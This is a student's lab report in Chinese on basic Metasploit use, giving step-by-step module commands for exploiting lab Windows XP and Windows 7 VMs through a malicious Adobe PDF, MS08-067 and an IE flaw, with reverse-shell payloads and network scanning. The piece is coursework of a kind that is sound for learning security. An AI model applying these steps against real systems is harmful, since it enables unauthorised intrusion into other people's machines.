20145205武钰_Exp5 MSF基础应用

实验后回答问题

  • exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词,就是个指令代码,并没有什么特别的,就是我们需要在MSF中进行执行了,敲一下就好。

  • payload:其实吧我对这个词理解不深,就感觉是我们的恶意代码要在靶机中可以做的事情,其实就是我们生产的恶意代码具体可以干什么。

  • encode:在我们学习了英语后我们都知道“en”是一个动词,所以encode就是对于我们之前的恶意代码进行一个再编译的过程,达到我们的目的——免杀

实验感想

  • 我们这个的实验是用已经被修补的漏洞,然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉,只要我们平时及时下载补丁,修补我们的漏洞,其实黑客是很难对我们进行漏洞的渗透攻击的,而且我们也要注意上网习惯,注意一些的奇怪的域名,小心被“钓鱼“,而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描,获得目标靶机的IP地址,之后进行主动攻击,获得目标机的权限,之后或是传输到靶机生产的PDF文件,或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。

  • 还有就是为了找到一个和大家不相同的漏洞,本来是想在MSF里直接搜一个挑个来做的,但是密密麻麻的英文让我退却了,然后就在百度上自己随便输了个漏洞年号,之后去看常用的搜索项,也是佩服我自己的聪明才智。

实践过程记录

Adobe阅读器渗透攻击

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3

  • 首先在实验前我们可以打开KALI中的显示隐藏文件夹,或是我们不打开显示隐藏文件,可以使用我们的之前实验中用到的netcat进行传输。

  • 还要注意的一点是保证两台虚拟机可以ping通,无论是nat还是桥接通了就可以,为了ping通的话需要关闭防火墙。

实验步骤

  • 在kali终端中开启msfconsole
  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing进入该漏洞模块
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷
  • 输入命令show options显示模块设定参数,然后按照我们自己的情况进行修改
  • 在设定完成后,生产PDF文件,然后将PDF文件拖入到靶机中,之后就像是我们之前做的恶意代码实验一样。
  • 建立一个监听模块,use exploit/multi/handler
  • 使用set payload windows/meterpreter/reverse_tcp建立一个可靠的反弹链接,监听模块的端口也是需要我们按照自己的情况进行设定的。
  • 最后exploit开启监听模块在靶机中打开问题PDF,即可获得靶机权限。
  • 但是这种方式靶机那边的PDF并不会打开,就像是程序崩溃的感觉一样,但是如果关闭了问题PDF文件,靶机同kali的链接就会中断,而且我们也可以通过网络资源发现靶机正在和kali进行链接。

MS08_067漏洞渗透攻击实践

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3
  • 预先设置虚拟机网络,保证两台虚拟机间可以ping通。

实验过程

  • 首先我们在知道了具体的漏洞号之后,在进行MSF后,输入search ms08_067,会显示出找到的渗透模块,如下图所示:

  • 输入use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用,在输入命令时时不时TAB一下会省很多功夫,建议没事多点一下TAB
  • 之后依然是设置有效攻击载荷,输入set payload generic/shell_reverse_tcp进入载荷模块,之后show options查看具体参数,然后修改参数。
  • 这里我们需要注意点的一点是,LHOST是本机地址,RHOST是靶机IP,设置好后,输入我们的开启攻击的号角exploit
  • 对比可知我们获得了靶机的管理员权限

IE浏览器渗透攻击——MS11030安全漏洞

实验准备

  • 两台虚拟机,其中一台为kali,一台为windows 7,浏览器版本为IE 8
  • 预先设置虚拟机网络,保证两台虚拟机间可以ping通。

实验过程

  • 首先进入漏洞模块,因为我们已知漏洞号之间进行漏洞模块,进入之后显示一下参数,然后根据我们的自身情况设置一下参数
  • 这里我们设置的错误路径为baidu.com,端口自己随意就好,尽量不要和已知使用端口占用进行冲突,然后我们设置攻击载荷。
  • 还是老套路,根据自己kali情况设置本地IP和端口,之后输入exploit启动漏洞服务,等待靶机那个“一个不小心”输入了一长串我们的钓鱼网址
  • 这时在靶机的浏览器中输入http://kali ip:port/uripath也就是输入对应的我们上面设置的参数
  • 稍作等待,kali这边就会有成功链接的反应
  • 之后输入sessions查看一下MSF中的会话情况,找到我们和win7的会话编号
  • 输入sessions -i 会话ID进入我们要进入的会话中,就会发现我们以后获取了靶机的权限

  • 这是我们win 7的IP地址

辅助模块的实践

实验前准备

  • 将kali机的模式改为桥接模式,因为这个在实际应用中最好我们可以使用公网地址,虽然这样会被抓,或是在无线局域网中使用桥接模式,可以保证和其他在这个局域网中的主机在同一个网段中,可以ping通。
  • 本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
  • 为了提升一下扫描速度,我们可以预先建立msf数据库,在kali的终端中依次输入以下命令service postgresql start之后输入msfdb start
  • 然后进入msf
  • 输入use auxiliary/scanner/discovery/arp_sweep进入模块,然后输入show options查看并修改参数
  • 然后根据自身的情况修改参数
  • 然后就可以开始扫描了了,因为是辅助模块,并没有进行漏洞渗透攻击,所以我们的启动指令是run,然后可以看到这个局域网中除了自己的主机,其他的主机,因为我当时只开了kali,所以只会扫描到我的win 10主机
  • 在确认可以ping通后,使用nmap进行开放端口扫描,探知该主机开放的端口和服务

20145205武钰_Exp5 MSF基础应用的更多相关文章

  1. 20145218张晓涵_Exp5 MSF基础应用

    20145218张晓涵_Exp5 MSF基础应用 实验原理 MS08-067漏洞描述 MS08-067漏洞的全称为"Windows Server服务RPC请求缓冲区溢出漏洞",如果 ...

  2. 20145205 武钰 《网络对抗》Exp8 Web基础

    一点题外话 本次实验我三号完成的,由于一些原因吧,一直没发博客,拖到了现在,这里说就是评判一下自己的懒惰. 实验后问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能. 一个表单有三个基本组成 ...

  3. 20145205武钰《网络对抗》web安全基础实践

    实验后问题回答 (1)SQL注入攻击原理,如何防御 攻击原理:SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的 防御手 ...

  4. 20165223《网络对抗技术》Exp5 MSF基础应用

    目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netap ...

  5. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  6. 20155324 实验5 MSF基础应用

    20155324 实验5 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 服务器信息块(SMB)是一个网络文件共享协议,它允许应用程序和终端用户从远端的 ...

  7. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  8. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  9. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

随机推荐

  1. CSU 1808 - 地铁 - [最短路变形]

    题目链接:http://acm.csu.edu.cn/csuoj/problemset/problem?pid=1808 Time limit: 5000 ms Memory limit: 13107 ...

  2. 【紫书】Undraw the Trees UVA - 10562 递归,字符串

    题意:给你画了一颗树,你要把它的前序输出. 题解:读进到二维数组.边解析边输出. 坑:少打了个-1. #define _CRT_SECURE_NO_WARNINGS #include<cstri ...

  3. function &w(){}

    CodeIgniter 3.1.0 <?php //\system\core\Common.php function &load_class($class, $directory = ' ...

  4. 开启 NFS 文件系统提升 Vagrant 共享目录的性能

    Vagrant 默认的 VirtualBox 共享目录方式读写性能表现并不好,好在 Vagrant 支持 NFS 文件系统方式的共享,我们可以启用 NFS 提升性能 开启方法 首先要把虚拟机的网络设置 ...

  5. JAVA 的wait(), notify()与synchronized同步机制

    转自:http://blog.csdn.net/zyplus/article/details/6672775 在JAVA中,是没有类似于PV操作.进程互斥等相关的方法的.JAVA的进程同步是通过syn ...

  6. table切换(自己写)

    <!DOCTYPE HTML><html> <head> <meta charset="utf-8"> <meta name= ...

  7. 常见浏览器兼容性问题与解决方案css篇

    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大. 碰到频率:100% 解决方案:CSS里    ...

  8. python len() 函数

    Python len() Python len() 方法返回对象(字符.列表.元组等)长度或项目个数. len(obj) 方法语法 obj -- 对象(字符串.列表.元组.字典等) 字符串长度 > ...

  9. 订阅号助手App发布 手机也能管理公众号了

    盼着许久的微信订阅号助手app终于发布了!“ 微信团队发布「订阅号助手」App,支持公众号运营者在手机上发表内容.查看和回复消息.管理已关注用户和帐号.暂时只支持iOS平台,Android平台敬请期待 ...

  10. 【spring mvc】springmvc在tomcat中的执行过程

    一.WEB容器在启动时,它会为每个WEB应用程序都创建一个对应的ServletContext对象(每个web应用程序唯一),它代表当前web应用web容器提供其一个全局的上下文环境,其为后面的spri ...